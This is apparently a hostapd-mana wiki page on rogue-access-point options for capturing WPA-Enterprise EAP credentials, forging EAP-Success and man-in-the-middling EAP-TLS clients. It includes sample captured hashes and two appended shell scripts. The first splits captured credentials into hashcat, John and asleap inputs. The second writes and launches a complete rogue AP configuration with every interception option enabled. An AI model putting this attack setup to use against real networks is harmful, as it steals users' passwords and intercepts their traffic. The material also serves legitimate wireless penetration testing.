
MANA EAP Options (aka WPE)

bitbane edited this page Aug 22, 2018 · 2 revisions


This assumes a basic understanding of hostapd.conf files. If you don’t have that, please read simplest hostapd.conf.

Certain EAP methods used by 802.1X (WPA-Enterprise) networks are vulnerable to credential interception by a rogue access point: if the client does not validate the authentication server's certificate, it will run the inner authentication against the attacker's server and hand over either a plaintext password or a challenge/response pair that can be cracked offline. These attacks were first popularised in freeradius-wpe (wireless pwnage edition) and continue in the modern hostapd-wpe mod. hostapd-mana supports many of the same attacks, and in some cases takes them further. This page details the relevant configuration options.

WPE Mode

You can enable WPE mode, which will intercept various EAP credentials, with the following config options:

mana_wpe=1

Currently, WPE has been implemented for the following EAP modes:

  • EAP-PEAP/MSCHAPv2 (both PEAPv0 and PEAPv1) *

  • EAP-PEAP/GTC (both PEAPv0 and PEAPv1) *

  • EAP-PEAP/MD5 (both PEAPv0 and PEAPv1)

  • EAP-TTLS/EAP-MD5

  • EAP-TTLS/EAP-GTC *

  • EAP-TTLS/EAP-MSCHAPv2 *

  • EAP-TTLS/MSCHAPv2 *

  • EAP-TTLS/MSCHAP *

  • EAP-TTLS/PAP *

  • EAP-TTLS/CHAP *

  • EAP-MD5 *

  • EAP-MSCHAPv2

  • EAP-GTC *

* Tested and confirmed to work. The remaining modes share the same code paths and should work, but have not been verified.

By default the captured credentials are written to stdout only, in whichever of the asleap, John the Ripper, hashcat or plaintext formats apply to the EAP method in use (MSCHAPv2 gets all three cracker formats). The outer (phase 0) and inner (phase 1) identities are printed first. For example:

MANA EAP Identity Phase 0: anonymous
MANA EAP Identity Phase 1: test
MANA EAP EAP-MSCHAPV2 ASLEAP user=test | asleap -C d3:d9:2d:4a:5c:61:6a:e9 -R c6:5d:90:4a:78:7c:ca:76:7b:64:51:db:10:40:10:39:dc:e5:61:21:4b:27:43:3d
MANA EAP EAP-MSCHAPV2 JTR | test:$NETNTLM$d3d92d4a5c616ae9$c65d904a787cca767b6451db10401039dce561214b27433d:::::::
MANA EAP EAP-MSCHAPV2 HASHCAT | test::::c65d904a787cca767b6451db10401039dce561214b27433d:d3d92d4a5c616ae9

Logging credentials

Warning
If you don’t provide this option, you’ll have to pull credentials out of your terminal's scrollback buffer, which isn’t fun.

If you would like to have the captured credentials written to a file, then use the following config options:

mana_credout=hostapd.credout
As with other file-based options, ideally you should use a full path.

Credentials are written with their EAP mode (and, for some modes, the username) in square brackets on the left, then a TAB (so that cut can split the line), then the credential in the appropriate cracking format. Here are some examples (all hashes are test:password):

[EAP-MSCHAPV2 ASLEAP user=test] asleap -C 5d:79:b2:a8:59:66:d3:47 -R 55:6f:dd:a5:f6:7d:2b:74:6c:a3:31:5f:d8:b9:3a:dc:ab:5c:79:27:90:a9:2e:87
[EAP-MSCHAPV2 JTR]      test:$NETNTLM$5d79b2a85966d347$556fdda5f67d2b746ca3315fd8b93adcab5c792790a92e87:::::::
[EAP-MSCHAPV2 HASHCAT]  test::::556fdda5f67d2b746ca3315fd8b93adcab5c792790a92e87:5d79b2a85966d347
[TTLS-MSCHAPV2 ASLEAP user=test]        asleap -C 12:19:ea:7c:d2:a8:cd:42 -R 75:4c:13:f1:14:79:76:f5:e9:8b:de:f6:26:97:8d:fc:bd:3d:a3:af:9f:32:b0:0c
[TTLS-MSCHAPV2 JTR]     test:$NETNTLM$1219ea7cd2a8cd42$754c13f1147976f5e98bdef626978dfcbd3da3af9f32b00c:::::::
[TTLS-MSCHAPV2 HASHCAT] test::::754c13f1147976f5e98bdef626978dfcbd3da3af9f32b00c:1219ea7cd2a8cd42
[TTLS-MSCHAP ASLEAP user=test]  asleap -C 0c:82:5c:6c:11:c2:7c:f6 -R 25:42:3b:39:5b:c0:de:70:7e:af:88:3e:bc:c7:f1:2f:51:5d:1c:99:d0:7b:b8:f8
[TTLS-MSCHAP JTR]       test:$NETNTLM$0c825c6c11c27cf6$25423b395bc0de707eaf883ebcc7f12f515d1c99d07bb8f8:::::::
[TTLS-MSCHAP HASHCAT]   test::::25423b395bc0de707eaf883ebcc7f12f515d1c99d07bb8f8:0c825c6c11c27cf6
[TTLS-CHAP JTR user=test]     $chap$b7*c2e0f237f5c14a011f94cea57817ba2e*d2006e63307240ce9934b79b8ed2ffc3
[TTLS-CHAP HASHCAT user=test] d2006e63307240ce9934b79b8ed2ffc3:c2e0f237f5c14a011f94cea57817ba2e:b7
[TTLS-PAP]      test:password
[MD5 JTR user=test]     $chap$b7*c2e0f237f5c14a011f94cea57817ba2e*d2006e63307240ce9934b79b8ed2ffc3
[MD5 HASHCAT user=test] d2006e63307240ce9934b79b8ed2ffc3:c2e0f237f5c14a011f94cea57817ba2e:b7
[GTC]   test:password

Because the file is tab separated, you can pull out just the hashes for one cracker with, for example:

grep HASHCAT <file>|cut -f2
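As an added example (not part of hostapd-mana or this wiki), the POSIX shell script below does the same split for every format at once. It assumes the tab-separated layout shown above, including the "user=..." suffix that the CHAP and MD5 tags carry inside the brackets and the keyword-less tags of the plaintext methods; the sample credout lines are constructed from the test:password hashes above, and the hashcat mode numbers (5500 for the NetNTLMv1-style MSCHAP payloads, 4800 for the MD5 CHAP layout) are the standard hashcat modes for those hash formats.

```sh
#!/bin/sh
# Added example, not part of hostapd-mana: split a mana_credout file into
# inputs for each cracker. Assumes the layout shown above, one credential
# per line: "[METHOD FORMAT ...]" <TAB> payload. Plaintext methods (PAP,
# GTC) carry no format keyword and their payload is "user:password".
set -eu

# Constructed sample in the credout layout, using the test:password
# values shown above (the wiki rendering shows spaces; the file uses tabs).
sample_credout() {
  printf '%s\t%s\n' '[EAP-MSCHAPV2 ASLEAP user=test]' 'asleap -C 5d:79:b2:a8:59:66:d3:47 -R 55:6f:dd:a5:f6:7d:2b:74:6c:a3:31:5f:d8:b9:3a:dc:ab:5c:79:27:90:a9:2e:87'
  printf '%s\t%s\n' '[EAP-MSCHAPV2 JTR]' 'test:$NETNTLM$5d79b2a85966d347$556fdda5f67d2b746ca3315fd8b93adcab5c792790a92e87:::::::'
  printf '%s\t%s\n' '[EAP-MSCHAPV2 HASHCAT]' 'test::::556fdda5f67d2b746ca3315fd8b93adcab5c792790a92e87:5d79b2a85966d347'
  printf '%s\t%s\n' '[TTLS-MSCHAPV2 HASHCAT]' 'test::::754c13f1147976f5e98bdef626978dfcbd3da3af9f32b00c:1219ea7cd2a8cd42'
  printf '%s\t%s\n' '[TTLS-CHAP JTR user=test]' '$chap$b7*c2e0f237f5c14a011f94cea57817ba2e*d2006e63307240ce9934b79b8ed2ffc3'
  printf '%s\t%s\n' '[TTLS-CHAP HASHCAT user=test]' 'd2006e63307240ce9934b79b8ed2ffc3:c2e0f237f5c14a011f94cea57817ba2e:b7'
  printf '%s\t%s\n' '[TTLS-PAP]' 'test:password'
  printf '%s\t%s\n' '[GTC]' 'test:password'
}

# Print the payload of every line whose bracketed tag names FORMAT
# (ASLEAP, JTR or HASHCAT). The tag may carry "user=..." after the keyword.
credout_extract() {   # $1 = credout file, $2 = FORMAT keyword
  awk -F'\t' -v fmt="$2" '$1 ~ ("^\\[[^]]* " fmt "( |\\])") { print $2 }' "$1"
}

# Payloads that are already plaintext: tags with no cracker keyword.
credout_plaintext() {   # $1 = credout file
  awk -F'\t' '$1 !~ /(ASLEAP|JTR|HASHCAT)/ { print $2 }' "$1"
}

# Pick the hashcat mode from the payload shape: "user::::resp:chal" is
# NetNTLMv1 (mode 5500); "resp:chal:id" is the MD5 CHAP layout (mode 4800).
hashcat_mode() {   # $1 = one hashcat payload
  case $1 in
    *::::*:*) echo 5500 ;;
    *)        echo 4800 ;;
  esac
}

# Write one file per cracker (hashcat split by mode) into directory $2.
credout_split() {   # $1 = credout file, $2 = output dir
  mkdir -p "$2"
  credout_extract "$1" HASHCAT | while IFS= read -r h; do
    printf '%s\n' "$h" >> "$2/hashcat-$(hashcat_mode "$h").txt"
  done
  credout_extract "$1" JTR    > "$2/jtr.txt"
  credout_extract "$1" ASLEAP > "$2/asleap.sh"   # ready-to-run asleap commands
  credout_plaintext "$1"      > "$2/plaintext.txt"
}

if [ $# -ge 1 ]; then
  credout_split "$1" "${2:-.}"
  # then e.g.:  hashcat -m 5500 hashcat-5500.txt wordlist.txt
  #             john --format=netntlm jtr.txt
fi
```

Saved as, say, credsplit.sh and run as credsplit.sh /full/path/hostapd.credout outdir, it leaves hashcat-5500.txt, hashcat-4800.txt, jtr.txt, asleap.sh and plaintext.txt in outdir; the asleap lines are complete commands, so sh asleap.sh runs them all.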

EAP Success

Certain clients or EAP methods do not protect against a rogue access point at all: the attacker can simply return an EAP-Success message to the client, and it will complete the connection. Methods such as MSCHAPv2 are designed to prevent this, because the RADIUS server must prove knowledge of the password to the client (the MSCHAPv2 authenticator response) before the client accepts success. Notably iOS & macOS won’t perform this validation.

To enable sending EAP success messages, use the following config option:

mana_eapsuccess=1

EAP TLS MitM

If EAP-TLS is in use there is no password to capture, but it is possible to have mana accept whatever client certificate is presented instead of validating it. A client that does not itself validate the server certificate will then complete EAP-TLS and associate, so you can still MitM the device even though its private key never leaves it.

You can enable this mode with the config option:

mana_eaptls=1
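The options from the WPE Mode, Logging credentials, EAP Success and EAP TLS MitM sections above all go in the same hostapd.conf. As an added example (not hostapd-mana's own code or an example from this wiki), the shell script below writes a complete configuration that combines them with the standard hostapd EAP-server settings they rely on, checks that every mana option made it in, and launches hostapd-mana. The interface name, SSID, channel, certificate paths and EAP user file contents are assumed placeholders: the certificate, key and DH files must already exist, and the eap_user layout follows upstream hostapd's hostapd.eap_user syntax (wildcard identity, phase 2 marked with [2]), so check it against the project's README before relying on it.

```sh
#!/bin/sh
# Added example, not hostapd-mana's own code: generate a hostapd-mana
# configuration that combines the WPE options documented on this page
# (mana_wpe, mana_credout, mana_eapsuccess, mana_eaptls) with the
# standard hostapd EAP-server settings they depend on, then launch it.
# Assumptions: interface, SSID, channel, certificate paths and the EAP
# user file contents are placeholders; the cert/key/DH files must exist.
set -eu

write_wpe_config() {   # $1 = output dir, $2 = interface, $3 = SSID, $4 = cert dir
  dir=$1; iface=$2; ssid=$3; certs=$4
  mkdir -p "$dir"
  cat > "$dir/hostapd-wpe.conf" <<EOF
interface=$iface
ssid=$ssid
hw_mode=g
channel=6

# Standard hostapd WPA2-Enterprise using the built-in EAP server
wpa=2
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP
rsn_pairwise=CCMP
ieee8021x=1
eap_server=1
eap_user_file=$dir/hostapd-wpe.eap_user
ca_cert=$certs/ca.pem
server_cert=$certs/server.pem
private_key=$certs/server.key
dh_file=$certs/dh.pem

# hostapd-mana WPE options from this page (full paths, as the page advises)
mana_wpe=1
mana_credout=$dir/hostapd.credout
mana_eapsuccess=1
mana_eaptls=1
EOF
  # Phase 1 offers the tunnelled methods; the phase 2 line ([2]) uses a
  # wildcard identity so any inner username is accepted and logged.
  # Assumed layout, following upstream hostapd's hostapd.eap_user syntax.
  cat > "$dir/hostapd-wpe.eap_user" <<'EOF'
*	PEAP,TTLS,TLS,MD5,GTC
*	TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC	"password"	[2]
EOF
  printf '%s\n' "$dir/hostapd-wpe.conf"
}

# Succeeds only if every WPE option documented on this page is present.
config_has_wpe_options() {   # $1 = path to the generated conf
  for opt in mana_wpe=1 mana_credout= mana_eapsuccess=1 mana_eaptls=1; do
    grep -q "^$opt" "$1" || return 1
  done
}

if [ $# -ge 4 ]; then
  conf=$(write_wpe_config "$@")
  config_has_wpe_options "$conf"
  exec hostapd-mana "$conf"   # foreground; credentials land in mana_credout
fi
```

Invoked as, for example, sh wpe-ap.sh /root/wpe wlan0 CorpWiFi /root/wpe/certs, it writes /root/wpe/hostapd-wpe.conf and /root/wpe/hostapd-wpe.eap_user and starts hostapd-mana on them; drop mana_eaptls=1 if you only want the password-based methods, and leave mana_eapsuccess=1 out when you want to observe which clients refuse an unproven success rather than letting them associate.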